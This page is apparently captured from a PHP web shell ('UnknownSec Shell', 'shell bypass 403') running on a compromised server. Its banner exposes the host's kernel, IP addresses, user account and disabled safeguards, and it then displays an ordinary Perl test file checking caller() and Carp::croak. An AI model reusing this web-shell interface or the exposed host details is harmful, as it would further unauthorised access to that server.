shell bypass 403

UnknownSec Shell

Uname: Linux dedi-15171674.espacofacial.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
Software: Apache
PHP version: 8.2.33 [ PHP INFO ] PHP os: Linux
Server Ip: 104.21.5.151
Your Ip: 216.73.217.58
User: espa7358 (1004) | Group: espa7358 (1003)
Safe Mode: OFF
Disable Function:
NONE

name : caller.t
#!/usr/bin/perl -Tw

# Make sure caller() is undisturbed.

use strict;
use warnings;

use Test::Exception;
use Test::More tests => 3;

eval { die caller() . "\n" };
is( $@, "main\n" );

throws_ok { die caller() . "\n" }  qr/^main$/;


# Make sure our override of caller() does not mess up @DB::args and thus Carp
# The test is rather strange, but there is no clearer way to trigger this
# error. For details see:
# http://rt.perl.org/rt3/Public/Bug/Display.html?id=52610#txn-713770

require Carp;
my $croaker = sub { Carp::croak ('No bizarre errors') };

for my $x (1..1) {
  eval { $croaker->($x) };
}

throws_ok (
  sub { $croaker->() },
  qr/No bizarre errors/,
  "Croak works properly (final)",
);
© 2026 UnknownSec